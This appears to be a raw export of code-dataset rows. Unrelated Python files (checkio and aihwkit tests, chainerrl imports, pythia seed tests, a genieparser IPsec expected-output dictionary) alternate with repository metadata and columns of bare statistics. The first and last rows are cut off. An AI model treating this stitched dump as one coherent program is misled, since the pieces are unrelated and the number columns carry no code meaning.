SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
]
| 82.16
| 130
| 0.65628
| 211
| 2,054
| 6.388626
| 0.109005
| 0.106825
| 0.178042
| 0.320475
| 0.876855
| 0.876855
| 0.876855
| 0.876855
| 0.876855
| 0.876855
| 0
| 0.033582
| 0.217137
| 2,054
| 25
| 131
| 82.16
| 0.804726
| 0
| 0
| 0.708333
| 0
| 0
| 0.027737
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ff90ece4a103f07b6df27b55bf9a2bfde43c988b
| 220
|
py
|
Python
|
tests/checkio/home/test_pawn_brotherhood.py
|
zoido/checkio_python_solutions
|
858cc7eafbbf55c8506e14cce260d17406fbf09c
|
[
"MIT"
] | null | null | null |
tests/checkio/home/test_pawn_brotherhood.py
|
zoido/checkio_python_solutions
|
858cc7eafbbf55c8506e14cce260d17406fbf09c
|
[
"MIT"
] | 2
|
2017-10-14T17:44:17.000Z
|
2018-04-06T18:53:37.000Z
|
tests/checkio/home/test_pawn_brotherhood.py
|
zoido/checkio_python_solutions
|
858cc7eafbbf55c8506e14cce260d17406fbf09c
|
[
"MIT"
] | null | null | null |
from checkio.home.pawn_brotherhood import safe_pawns
def test_safe_pawns():
assert safe_pawns({"b4", "d4", "f4", "c3", "e3", "g5", "d2"}) == 6
assert safe_pawns({"b4", "c4", "d4", "e4", "f4", "g4", "e5"}) == 1
| 31.428571
| 70
| 0.577273
| 34
| 220
| 3.558824
| 0.705882
| 0.297521
| 0.247934
| 0.280992
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 0.163636
| 220
| 6
| 71
| 36.666667
| 0.570652
| 0
| 0
| 0
| 0
| 0
| 0.127273
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff98eb836ce0c90a85d4172e1f3fd67543217a4a
| 295
|
py
|
Python
|
chainerrl/explorers/__init__.py
|
kiyukuta/chainerrl
|
65f53cd728cbcd233864e9bea9ee2e57d1b68b00
|
[
"MIT"
] | null | null | null |
chainerrl/explorers/__init__.py
|
kiyukuta/chainerrl
|
65f53cd728cbcd233864e9bea9ee2e57d1b68b00
|
[
"MIT"
] | null | null | null |
chainerrl/explorers/__init__.py
|
kiyukuta/chainerrl
|
65f53cd728cbcd233864e9bea9ee2e57d1b68b00
|
[
"MIT"
] | null | null | null |
from chainerrl.explorers.additive_gaussian import AdditiveGaussian # NOQA
from chainerrl.explorers.additive_ou import AdditiveOU # NOQA
from chainerrl.explorers.epsilon_greedy import ConstantEpsilonGreedy # NOQA
from chainerrl.explorers.epsilon_greedy import LinearDecayEpsilonGreedy # NOQA
| 59
| 79
| 0.864407
| 32
| 295
| 7.84375
| 0.4375
| 0.207171
| 0.350598
| 0.310757
| 0.358566
| 0.358566
| 0.358566
| 0
| 0
| 0
| 0
| 0
| 0.094915
| 295
| 4
| 80
| 73.75
| 0.940075
| 0.064407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
92352c71c0b22b4fc5aa839f89a8f11e042ceae5
| 12,927
|
py
|
Python
|
tests/helpers/tiles.py
|
filemaster/aihwkit
|
473eda8c3c89f49acdfc2da9bd03b27e22e13b1a
|
[
"Apache-2.0"
] | null | null | null |
tests/helpers/tiles.py
|
filemaster/aihwkit
|
473eda8c3c89f49acdfc2da9bd03b27e22e13b1a
|
[
"Apache-2.0"
] | null | null | null |
tests/helpers/tiles.py
|
filemaster/aihwkit
|
473eda8c3c89f49acdfc2da9bd03b27e22e13b1a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# (C) Copyright 2020 IBM. All Rights Reserved.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Tile helpers for aihwkit tests."""
# pylint: disable=missing-function-docstring,too-few-public-methods
from aihwkit.simulator.tiles import AnalogTile, FloatingPointTile, InferenceTile
from aihwkit.simulator.configs.devices import (
IdealDevice,
ConstantStepDevice,
LinearStepDevice,
ExpStepDevice,
SoftBoundsDevice,
IOParameters,
DifferenceUnitCell,
VectorUnitCell,
TransferCompound,
ReferenceUnitCell
)
from aihwkit.simulator.configs import (
FloatingPointRPUConfig,
InferenceRPUConfig,
SingleRPUConfig,
UnitCellRPUConfig,
)
from aihwkit.simulator.rpu_base import tiles
class FloatingPoint:
"""FloatingPointTile."""
simulator_tile_class = tiles.FloatingPointTile
first_hidden_field = None
use_cuda = False
def get_rpu_config(self):
return FloatingPointRPUConfig()
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return FloatingPointTile(out_size, in_size, rpu_config, **kwargs)
class Ideal:
"""AnalogTile with IdealDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = None
use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=IdealDevice())
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class ConstantStep:
"""AnalogTile with ConstantStepDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound'
use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=ConstantStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class LinearStep:
"""AnalogTile with LinearStepDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound'
use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=LinearStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class SoftBounds:
"""AnalogTile with SoftBoundsDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound'
use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class ExpStep:
"""AnalogTile with ExpStepDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound'
use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=ExpStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Vector:
"""AnalogTile with VectorUnitCell."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound_0'
use_cuda = False
def get_rpu_config(self):
return UnitCellRPUConfig(device=VectorUnitCell(
unit_cell_devices=[
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0),
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Reference:
"""AnalogTile with ReferenceUnitCell."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound_0'
use_cuda = False
def get_rpu_config(self):
return UnitCellRPUConfig(device=ReferenceUnitCell(
unit_cell_devices=[
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0),
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Difference:
"""AnalogTile with DifferenceUnitCell."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound_0'
use_cuda = False
def get_rpu_config(self):
return UnitCellRPUConfig(device=DifferenceUnitCell(
unit_cell_devices=[
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Transfer:
"""AnalogTile with TransferCompound."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound_0'
use_cuda = False
def get_rpu_config(self):
return UnitCellRPUConfig(device=TransferCompound(
unit_cell_devices=[
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0),
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0)
],
transfer_forward=IOParameters(is_perfect=True),
transfer_every=1,
gamma=0.1
))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class Inference:
"""Inference tile."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = None
use_cuda = False
def get_rpu_config(self):
return InferenceRPUConfig()
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return InferenceTile(out_size, in_size, rpu_config, **kwargs)
class FloatingPointCuda:
"""FloatingPointTile."""
simulator_tile_class = getattr(tiles, 'CudaFloatingPointTile', None)
first_hidden_field = None
use_cuda = True
def get_rpu_config(self):
return FloatingPointRPUConfig()
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return FloatingPointTile(out_size, in_size, rpu_config, **kwargs).cuda()
class IdealCuda:
"""AnalogTile with IdealDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = None
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=IdealDevice())
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class ConstantStepCuda:
"""AnalogTile with ConstantStepDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound'
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=ConstantStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class LinearStepCuda:
"""AnalogTile with LinearStepDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound'
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=LinearStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class SoftBoundsCuda:
"""AnalogTile with SoftBoundsDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound'
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class ExpStepCuda:
"""AnalogTile with ExpStepDevice."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound'
use_cuda = True
def get_rpu_config(self):
return SingleRPUConfig(device=ExpStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class VectorCuda:
"""AnalogTile with VectorUnitCell."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound_0'
use_cuda = True
def get_rpu_config(self):
return UnitCellRPUConfig(device=VectorUnitCell(
unit_cell_devices=[
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0),
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class ReferenceCuda:
"""AnalogTile with ReferenceUnitCell."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound_0'
use_cuda = True
def get_rpu_config(self):
return UnitCellRPUConfig(device=ReferenceUnitCell(
unit_cell_devices=[
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0),
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class DifferenceCuda:
"""AnalogTile with DifferenceUnitCell."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound_0'
use_cuda = True
def get_rpu_config(self):
return UnitCellRPUConfig(device=DifferenceUnitCell(
unit_cell_devices=[
ConstantStepDevice(w_max_dtod=0, w_min_dtod=0)
]))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class TransferCuda:
"""AnalogTile with TransferUnitCell."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = 'max_bound_0'
use_cuda = True
def get_rpu_config(self):
return UnitCellRPUConfig(device=TransferCompound(
unit_cell_devices=[
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0),
SoftBoundsDevice(w_max_dtod=0, w_min_dtod=0)
],
transfer_forward=IOParameters(is_perfect=True),
transfer_every=1,
gamma=0.1
))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs).cuda()
class InferenceCuda:
"""Inference tile."""
simulator_tile_class = getattr(tiles, 'CudaAnalogTile', None)
first_hidden_field = None
use_cuda = True
def get_rpu_config(self):
return InferenceRPUConfig()
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return InferenceTile(out_size, in_size, rpu_config, **kwargs).cuda()
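All of the helper classes above expose the same two-method protocol (get_rpu_config / get_tile), which is what lets parametrized tests treat CPU and CUDA variants interchangeably. A minimal usage sketch, assuming aihwkit is importable exactly as in this module:
helper = ConstantStep()
tile = helper.get_tile(out_size=3, in_size=4)   # AnalogTile built from a ConstantStepDevice config
cuda_tile = ConstantStepCuda().get_tile(3, 4)   # same device family, moved to CUDA (needs a GPU)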
| 31.761671
| 85
| 0.696913
| 1,649
| 12,927
| 5.141298
| 0.094603
| 0.140127
| 0.062279
| 0.067469
| 0.851852
| 0.845247
| 0.789809
| 0.789809
| 0.788158
| 0.787096
| 0
| 0.00654
| 0.207473
| 12,927
| 406
| 86
| 31.839901
| 0.820986
| 0.095846
| 0
| 0.8125
| 0
| 0
| 0.027763
| 0.001816
| 0
| 0
| 0
| 0
| 0
| 1
| 0.171875
| false
| 0
| 0.015625
| 0.085938
| 0.703125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
9265ef31bbba9dc6d911e8e58102e67e90f1654c
| 2,707
|
py
|
Python
|
src/tests/test_random.py
|
Shashvatb/pythia
|
07fb178940a0f3cefd1d9126bdf974005a88b70c
|
[
"Apache-2.0"
] | 84
|
2016-06-01T23:53:50.000Z
|
2021-12-15T03:57:19.000Z
|
src/tests/test_random.py
|
Shashvatb/pythia
|
07fb178940a0f3cefd1d9126bdf974005a88b70c
|
[
"Apache-2.0"
] | 79
|
2016-06-02T01:18:39.000Z
|
2016-10-01T00:32:12.000Z
|
src/tests/test_random.py
|
Shashvatb/pythia
|
07fb178940a0f3cefd1d9126bdf974005a88b70c
|
[
"Apache-2.0"
] | 29
|
2016-05-31T17:44:31.000Z
|
2021-06-01T11:06:13.000Z
|
import numpy as np
from src.pipelines.master_pipeline import get_args, main as pipeline_main
from src.utils.sampling import label_sample
def test_random():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=True,
LDA_APPEND=True,
BOW_APPEND=True,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1==run2
def test_random_logreg():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=False,
LOG_REG=True,
LDA_APPEND=False,
BOW_APPEND=True,
W2V_APPEND=False,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1==run2
def test_random_xgboost():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=True,
LDA_APPEND=False,
BOW_APPEND=True,
W2V_APPEND=False,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1==run2
def test_random_svm():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=False,
SVM=True,
LDA_APPEND=False,
BOW_APPEND=True,
W2V_APPEND=False,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1 == run2
def test_random_lda():
args = get_args(SEED=41,
directory='data/stackexchange/anime',
XGB=False,
LOG_REG=True,
LDA_APPEND=True,
BOW_APPEND=False,
W2V_APPEND=False,
RESAMPLING=False)
run1 = pipeline_main(args)
run2 = pipeline_main(args)
assert run1 == run2
def test_random_resampling():
data = [ { 'key': True, 'data': 123 },
{ 'key': True, 'data': 123 },
{ 'key': True, 'data': 123 },
{ 'key': True, 'data': 123 },
{ 'key': True, 'data': 123 },
{ 'key': False, 'data': 123 },
{ 'key': False, 'data': 123 },
]
def get_state(seed):
return np.random.RandomState(seed)
sampled_data = label_sample(data, 'key', random_state=get_state(41))
sampled_data2 = label_sample(data, 'key', random_state=get_state(41))
assert sampled_data == sampled_data2
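The resampling test above hinges on np.random.RandomState being deterministic for a fixed seed; a minimal illustration of that property, not part of the original test module:
import numpy as np
# Two RandomState objects built from the same seed produce identical draws,
# which is why label_sample returns the same sample for both calls above.
a = np.random.RandomState(41).permutation(10)
b = np.random.RandomState(41).permutation(10)
assert (a == b).all()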
| 33.419753
| 73
| 0.515331
| 281
| 2,707
| 4.761566
| 0.170819
| 0.098655
| 0.119581
| 0.056054
| 0.800448
| 0.800448
| 0.760837
| 0.760837
| 0.760837
| 0.702541
| 0
| 0.036659
| 0.385297
| 2,707
| 80
| 74
| 33.8375
| 0.767428
| 0
| 0
| 0.756757
| 0
| 0
| 0.064647
| 0.04433
| 0
| 0
| 0
| 0
| 0.081081
| 1
| 0.094595
| false
| 0
| 0.040541
| 0.013514
| 0.148649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a66be4fb1e9849e030ea7c221f4e56315c9c89c9
| 9,889
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowCryptoIpsecSaDetail/cli/equal/golden_output_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowCryptoIpsecSaDetail/cli/equal/golden_output_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowCryptoIpsecSaDetail/cli/equal/golden_output_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
expected_output={
"interface":{
"GigabitEthernet3":{
"crypto_map_tag":"vpn-crypto-map",
"ident":{
1:{
"acl":"origin_is_acl,",
"action":"PERMIT",
"current_outbound_spi":"0x397C36EE(964441838)",
"dh_group":"none",
"inbound_ah_sas":{
},
"inbound_esp_sas":{
"spi":{
"0x658F7C11(1703902225)":{
"conn_id":2076,
"crypto_map":"vpn-crypto-map",
"flow_id":"CSR",
"flow_id_val":76,
"transform":"esp-256-aes esp-sha256-hmac",
"in_use_settings":"Tunnel, ",
"iv_size":"16 bytes",
"remaining_key_lifetime":"(4607999/83143)",
"replay_detection_support":"Y",
"sibling_flags":"FFFFFFFF80000048",
"status":"ACTIVE(ACTIVE)"
}
}
},
"inbound_pcp_sas":{
},
"ip_mtu_idb":"GigabitEthernet3",
"local_crypto_endpt":"1.1.1.2",
"local_ident":{
"addr":"20.20.20.0",
"mask":"255.255.255.0",
"port":"0",
"prot":"0"
},
"outbound_ah_sas":{
},
"outbound_esp_sas":{
"spi":{
"0x397C36EE(964441838)":{
"conn_id":2075,
"crypto_map":"vpn-crypto-map",
"flow_id":"CSR",
"flow_id_val":75,
"transform":"esp-256-aes esp-sha256-hmac",
"in_use_settings":"Tunnel, ",
"iv_size":"16 bytes",
"remaining_key_lifetime":"(4607999/83143)",
"replay_detection_support":"Y",
"sibling_flags":"FFFFFFFF80000048",
"status":"ACTIVE(ACTIVE)"
}
}
},
"outbound_pcp_sas":{
},
"path_mtu":1500,
"peer_ip":"1.1.1.1",
"pfs":"N",
"pkts_compr_failed":0,
"pkts_compressed":0,
"pkts_decaps":4,
"pkts_decompress_failed":0,
"pkts_decompressed":0,
"pkts_decrypt":4,
"pkts_internal_err_recv":0,
"pkts_internal_err_send":0,
"pkts_invalid_identity_recv":0,
"pkts_invalid_prot_recv":0,
"pkts_invalid_sa_rcv":0,
"pkts_no_sa_send":0,
"pkts_not_compressed":0,
"pkts_not_decompressed":0,
"pkts_not_tagged_send":0,
"pkts_not_untagged_rcv":0,
"pkts_replay_failed_rcv":0,
"pkts_replay_rollover_rcv":0,
"pkts_replay_rollover_send":0,
"pkts_tagged_send":0,
"pkts_untagged_rcv":0,
"pkts_verify":4,
"pkts_verify_failed":0,
"plaintext_mtu":1438,
"ip_mtu":1500,
"port":500,
"protected_vrf":"(none)",
"remote_crypto_endpt":"1.1.1.1",
"remote_ident":{
"addr":"10.10.10.0",
"mask":"255.255.255.0",
"port":"0",
"prot":"0"
}
},
2:{
"acl":"origin_is_acl,",
"action":"PERMIT",
"current_outbound_spi":"0x0(0)",
"dh_group":"none",
"inbound_ah_sas":{
},
"inbound_esp_sas":{
},
"inbound_pcp_sas":{
},
"ip_mtu_idb":"GigabitEthernet3",
"local_crypto_endpt":"1.1.1.2",
"local_ident":{
"addr":"40.40.40.0",
"mask":"255.255.255.0",
"port":"0",
"prot":"0"
},
"outbound_ah_sas":{
},
"outbound_esp_sas":{
},
"outbound_pcp_sas":{
},
"path_mtu":1500,
"peer_ip":"1.1.1.1",
"pfs":"N",
"pkts_compr_failed":0,
"pkts_compressed":0,
"pkts_decaps":0,
"pkts_decompress_failed":0,
"pkts_decompressed":0,
"pkts_decrypt":0,
"pkts_internal_err_recv":0,
"pkts_internal_err_send":0,
"pkts_invalid_identity_recv":0,
"pkts_invalid_prot_recv":0,
"pkts_invalid_sa_rcv":0,
"pkts_no_sa_send":0,
"pkts_not_compressed":0,
"pkts_not_decompressed":0,
"pkts_not_tagged_send":0,
"pkts_not_untagged_rcv":0,
"pkts_replay_failed_rcv":0,
"pkts_replay_rollover_rcv":0,
"pkts_replay_rollover_send":0,
"pkts_tagged_send":0,
"pkts_untagged_rcv":0,
"pkts_verify":0,
"pkts_verify_failed":0,
"plaintext_mtu":1500,
"port":500,
"ip_mtu":1500,
"protected_vrf":"(none)",
"remote_crypto_endpt":"1.1.1.1",
"remote_ident":{
"addr":"30.30.30.0",
"mask":"255.255.255.0",
"port":"0",
"prot":"0"
}
}
},
"local_addr":"1.1.1.2"
},
"Tunnel0":{
"crypto_map_tag":"Tunnel0-head-0",
"ident":{
1:{
"acl":"origin_is_acl,",
"action":"PERMIT",
"current_outbound_spi":"0x2E8482F8(780436216)",
"dh_group":"none",
"inbound_ah_sas":{
},
"inbound_esp_sas":{
"spi":{
"0xA54D38A4(2773301412)":{
"conn_id":2077,
"crypto_map":"Tunnel0-head-0",
"flow_id":"CSR",
"flow_id_val":77,
"transform":"esp-256-aes esp-sha256-hmac",
"in_use_settings":"Tunnel, ",
"iv_size":"16 bytes",
"remaining_key_lifetime":"(4608000/3189)",
"replay_detection_support":"Y",
"sibling_flags":"FFFFFFFF80004048",
"status":"ACTIVE(ACTIVE)"
}
}
},
"inbound_pcp_sas":{
},
"ip_mtu_idb":"GigabitEthernet5",
"local_crypto_endpt":"2.2.2.2",
"local_ident":{
"addr":"0.0.0.0",
"mask":"0.0.0.0",
"port":"0",
"prot":"0"
},
"outbound_ah_sas":{
},
"outbound_esp_sas":{
"spi":{
"0x2E8482F8(780436216)":{
"conn_id":2078,
"crypto_map":"Tunnel0-head-0",
"flow_id":"CSR",
"flow_id_val":78,
"transform":"esp-256-aes esp-sha256-hmac",
"in_use_settings":"Tunnel, ",
"iv_size":"16 bytes",
"remaining_key_lifetime":"(4608000/3189)",
"replay_detection_support":"Y",
"sibling_flags":"FFFFFFFF80004048",
"status":"ACTIVE(ACTIVE)"
}
}
},
"outbound_pcp_sas":{
},
"path_mtu":1500,
"peer_ip":"2.2.2.1",
"pfs":"N",
"pkts_compr_failed":0,
"pkts_compressed":0,
"pkts_decaps":0,
"pkts_decompress_failed":0,
"pkts_decompressed":0,
"pkts_decrypt":0,
"pkts_internal_err_recv":0,
"pkts_internal_err_send":0,
"pkts_invalid_identity_recv":0,
"pkts_invalid_prot_recv":0,
"pkts_invalid_sa_rcv":0,
"pkts_no_sa_send":0,
"pkts_not_compressed":0,
"pkts_not_decompressed":0,
"pkts_not_tagged_send":0,
"pkts_not_untagged_rcv":0,
"pkts_replay_failed_rcv":0,
"pkts_replay_rollover_rcv":0,
"pkts_replay_rollover_send":0,
"pkts_tagged_send":0,
"pkts_untagged_rcv":0,
"pkts_verify":0,
"pkts_verify_failed":0,
"plaintext_mtu":1438,
"port":500,
"ip_mtu":1500,
"protected_vrf":"(none)",
"remote_crypto_endpt":"2.2.2.1",
"remote_ident":{
"addr":"0.0.0.0",
"mask":"0.0.0.0",
"port":"0",
"prot":"0"
}
}
},
"local_addr":"2.2.2.2"
}
}
}
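A quick, illustrative sanity check of the nested structure above (not part of the original expected-output module); the keys and values are taken directly from the dictionary:
assert expected_output["interface"]["GigabitEthernet3"]["ident"][1]["peer_ip"] == "1.1.1.1"
assert expected_output["interface"]["Tunnel0"]["local_addr"] == "2.2.2.2"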
| 35.444444
| 67
| 0.375569
| 832
| 9,889
| 4.097356
| 0.157452
| 0.092402
| 0.039601
| 0.036961
| 0.895864
| 0.890877
| 0.890877
| 0.874743
| 0.874743
| 0.830742
| 0
| 0.100241
| 0.495601
| 9,889
| 279
| 68
| 35.444444
| 0.5832
| 0
| 0
| 0.709434
| 0
| 0
| 0.375531
| 0.100404
| 0
| 0
| 0.00637
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a66c1046b636a94aae26bc4aa2b8a88780124835
| 2,460
|
py
|
Python
|
real_estate_api/owner/migrations/0003_auto_20180804_1441.py
|
rossi1/RES
|
729196bfa45cc2b47acc93c49c07c7e8f0f6ea93
|
[
"MIT"
] | null | null | null |
real_estate_api/owner/migrations/0003_auto_20180804_1441.py
|
rossi1/RES
|
